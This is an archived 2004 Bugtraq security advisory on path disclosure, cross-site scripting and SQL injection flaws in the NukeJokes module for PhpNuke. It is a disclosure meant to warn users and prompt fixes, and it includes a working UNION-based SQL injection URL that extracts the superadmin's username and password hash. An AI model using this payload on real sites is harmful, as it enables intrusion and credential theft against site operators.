[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    [waraxe-2004-SA#028 - Multiple vulnerabilities in NukeJokes
From:       Janek Vind <come2waraxe () yahoo ! com>
Date:       2004-05-08 19:22:17
Message-ID: 20040508192217.6679.qmail () www ! securityfocus ! com
[Download RAW message or body]





{================================================================================}
{                              [waraxe-2004-SA#028]                              }
{================================================================================}
{                                                                                }
{         [ Multiple vulnerabilities in NukeJokes module for PhpNuke ]           }
{                                                                                }
{================================================================================}
                                                                                      \
                
Author: Janek Vind "waraxe"
Date: 08. May 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=28


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From readme file:

"Nuke jokes is an addon for PHPNuke. It has been tested with PHPNuke 6.0. It should
work with 6.5 and some lower versions but I haven't been able to test it. Nuke Jokes
allows you to have a database of jokes on your website. Jokes are sperated into \
different categories to make them easier to find. It includes the ability to rate \
jokes, shows how many views they've had and other information. Also includes a search \
engine. The admin area allows you to add, edit and delete jokes and categories, \
install and uninstall the database and validate user added jokes."

Author: Adam Webb

Websites:

	http://www.funportal.host.sk
	http://funportal.beanwebb.com

I have tested two different versions of NukeJokes: v1.7 and 2 Beta. They seems to \
have same security bugs.

Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well, what to say? I was really surprised, when saw NukeJokes source code - almost \
ALL sql queries are WITHOUT ANY single quotes...
Wide area to practice sql injection attacks. And most user submitted parameters are \
not  sanitized at all, so full path disclosure and XSS cases exists there too. In \
fact, NukeJokes has so many bugs, that i'm too lazy to count them all. So i will just \
bring some examples...


A. Full path disclosure:

Examples:

http://localhost/nuke72/modules/NukeJokes/mainfunctions.php

http://localhost/nuke72/modules.php?name=NukeJokes&func=JokeView&jokeid=foobar

http://localhost/nuke72/modules.php?name=NukeJokes&func=CatView&cat=foobar



B. Cross-site scripting aka XSS:

Examples:

http://localhost/nuke72/modules.php?name=NukeJokes&func=CatView&cat=[xss code here]

http://localhost/nuke72/modules.php?name=NukeJokes&func=JokeView&jokeid=[xss code \
here]



C. Sql injection:

Example exploiting GET request:

http://localhost/nuke72/modules.php?name=NukeJokes&file=print&jokeid=-1/**/UNION/**/SE \
LECT/**/aid,pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*

and we can see superadmin's username and password's md5 hash with ease. Of course, \
mysql has to be 4.x with UNION functionality enabled, to successful exploiting.



Ending words to author(s) - NukeJokes is based on good ideas, but must be rewritten \
in secure way! This is not such big work - just add those single quotes to any sql \
queries and do sanitize variables, passed to script by client browser, to avoid \
cross-site scripting and path disclosure bugs. If you want some advise from me, you \
can always send an email and i will help.



Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to Raido Kerna and to all bugtraq readers in Estonia! Tervitused!
Special greets to http://www.gamecheaters.us staff!



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@yahoo.com
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic